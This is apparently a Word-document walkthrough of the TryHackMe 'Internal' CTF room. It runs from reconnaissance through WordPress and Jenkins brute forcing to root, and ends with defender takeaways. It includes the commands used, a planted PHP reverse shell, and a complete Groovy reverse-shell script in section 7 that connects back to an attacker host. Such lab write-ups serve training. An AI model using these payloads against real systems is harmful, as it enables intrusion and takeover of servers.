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TryHackMe – Internal: Full Walkthrough Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target: internal.thm (TryHackMe room 'Internal'). This report documents the full attack chain, from initial reconnaissance to root, for educational / CTF purposes only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Started with a fast port scanner (Threader3000) against the target IP, followed by an Nmap scan run in parallel to save time.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threader3000 &lt;TARGET_IP&gt;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nmap -sC -sV -p- &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Results: Port 22 (SSH) and Port 80 (HTTP - Apache) open. SSH and Apache versions looked current, so no obvious CVE was assumed there.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port 80 showed the default Ubuntu Apache page — a strong signal that hidden content exists elsewhere. Directory brute-forcing was used to discover it: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dirsearch -u http://&lt;TARGET_IP&gt; -e * -x 400,500 -r -t 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings: /blog, /blog/wp-login.php (WordPress), and /phpmyadmin (noted, not used later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Host File Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The room required using the hostname internal.thm instead of the raw IP (in scope per the room brief). Added a host mapping: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sudo nano /etc/hosts
10.10.XX.XX  internal.thm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browsing to http://internal.thm/blog then rendered the actual WordPress blog correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. WordPress Enumeration &amp; Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WordPress's login form leaks whether a username exists via different error messages ('incorrect password' vs 'unknown username'). Testing admin/test confirmed the admin username exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 WPScan – Users &amp; Plugins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wpscan --url http://internal.thm/blog --enumerate vp,u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WPScan confirmed the admin user (no API token was used, so vulnerability data was limited).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Brute Forcing WordPress Login (XML-RPC)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wpscan --url http://internal.thm/blog --usernames admin --passwords /root/Desktop/rockyou.txt --max-threads 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WPScan attacks XML-RPC, which WordPress exposes by default. This recovered valid credentials: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admin : mypassword123 (example placeholder used in the walkthrough)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Gaining a Shell via WordPress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Theme Editor → PHP Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logged into wp-admin as admin. Used Appearance → Theme Editor to edit the 404.php template of the active theme (Twenty Seventeen), replacing its contents with a standard PHP reverse shell (e.g. pentestmonkey's php-reverse-shell.php), pointing it at the attacker's IP and a chosen port.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nc -nlvp &lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After updating the file, the shell was triggered by requesting the modified 404 template directly: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http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This returned a reverse shell as the www-data user. Note: modifying a live theme file this way is acceptable only in a lab/CTF context — in a real engagement, a less destructive approach (e.g. adding a small web shell snippet rather than overwriting a whole template) is preferred.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Local Enumeration as www-data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual enumeration was required — files of interest were deliberately hidden from automated tools like LinPEAS by naming/location choices.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id
ls -la
cd /opt &amp;&amp; ls -la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Found /opt/wpsave.txt containing credentials for a second user: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cat /opt/wpsave.txt
# aubreanna : bubblegum123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed the user exists on the system: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cat /etc/passwd | grep aubreanna</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Pivoting to the aubreanna User (SSH)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ssh aubreanna@&lt;TARGET_IP&gt;
# password: bubblegum123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As aubreanna: grabbed user.txt, and found a note file referencing an internal Jenkins service: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cat jenkins.txt
# Internal Jenkins running on 172.17.0.2 (typical Docker bridge IP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verified a locally-listening service on port 8080 (Jenkins) and port 3306 (MySQL/phpMyAdmin, not used):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netstat -ano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Pivoting to Jenkins via SSH Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jenkins was bound to localhost:8080 on the target and not reachable directly. An SSH local port forward exposed it to the attacker machine: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ssh -L 8080:172.17.0.2:8080 aubreanna@&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browsing to http://127.0.0.1:8080 locally then loaded the Jenkins login page. Default credentials (admin/admin) failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="250"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Brute Forcing Jenkins Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used OWASP ZAP's Fuzzer (Burp Intruder equivalent) against the login POST request, fuzzing the j_password parameter for the admin user with a wordlist. Bad attempts returned a consistent response size (~351 bytes); the correct password produced a different size (~307 bytes) — a classic response-size-based differentiation attack.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Target params: j_username=admin, j_password=&lt;FUZZ&gt;
Wordlist: rockyou.txt (or a smaller curated list)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This recovered valid Jenkins credentials: admin / spongebob (example password found this way).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Remote Code Execution via Jenkins Script Console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With Jenkins admin access, the Script Console (Manage Jenkins → Script Console) allows arbitrary Groovy execution — a well-known RCE technique in Jenkins.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nc -nlvp &lt;PORT2&gt;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String host="&lt;ATTACKER_IP&gt;";
int port=&lt;PORT2&gt;;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};p.destroy();s.close();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executing this Groovy script in the Script Console returned a reverse shell as the jenkins user, running inside the Docker container network (172.17.0.x).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Privilege Escalation to Root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id
ifconfig / ip addr
cd /opt &amp;&amp; ls -la
cat note.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The note in /opt revealed credentials for the root account, deliberately hidden behind the Jenkins container as an extra layer of defense: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root : bubblegum123 (as found in the walkthrough)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used these credentials to SSH directly to the target as root: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ssh root@&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed root access and read the final flag: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0F0F0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id
ls -la
cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Attack Chain Summary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Nmap/Threader3000 → ports 22, 80 open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Dirsearch on port 80 → /blog (WordPress), /phpmyadmin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/etc/hosts entry for internal.thm to render the vhost correctly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WordPress username enumeration via login error messages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WPScan brute force via XML-RPC → admin credentials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Theme Editor (404.php) → PHP reverse shell as www-data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 enumeration in /opt → aubreanna credentials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SSH as aubreanna → discovered internal Jenkins (172.17.0.2:8080)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SSH local port forward to reach Jenkins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ZAP Fuzzer brute force of Jenkins login (response-size diffing)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Jenkins Script Console Groovy RCE → shell as jenkins (Docker container)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 enumeration in /opt (container) → root credentials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SSH as root → root flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Key Takeaways (Defender's Perspective)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WordPress login should not disclose whether a username exists — use generic error messages and rate-limit/lockout on failed attempts.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Disable XML-RPC if not needed; it's a common brute-force / amplification vector.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Restrict Theme/Plugin Editor access, or disable file editing entirely (DISALLOW_FILE_EDIT in wp-config.php).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Never store plaintext credentials in world-readable files (e.g. /opt/wpsave.txt).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Jenkins Script Console must be restricted to trusted admins only; consider disabling it in production and enforcing strong authentication + matrix-based authorization.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Avoid credential reuse across services (aubreanna's and root's passwords were related/reused in the walkthrough).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Segment internal services (Jenkins, DB) so they are not reachable even via SSH tunnel without additional controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Learning Resources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TryHackMe room: Internal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WPScan documentation: https://wpscan.com/wordpress-security-scanner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Jenkins Script Console RCE technique: search 'Jenkins Groovy script console reverse shell'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OWASP ZAP Fuzzer guide: https://www.zaproxy.org/docs/desktop/addons/fuzzer/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SSH port forwarding (local tunneling): 'ssh -L' documentation, man ssh_config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2026-09-28T12:06:14.746Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-28T12:06:14.755Z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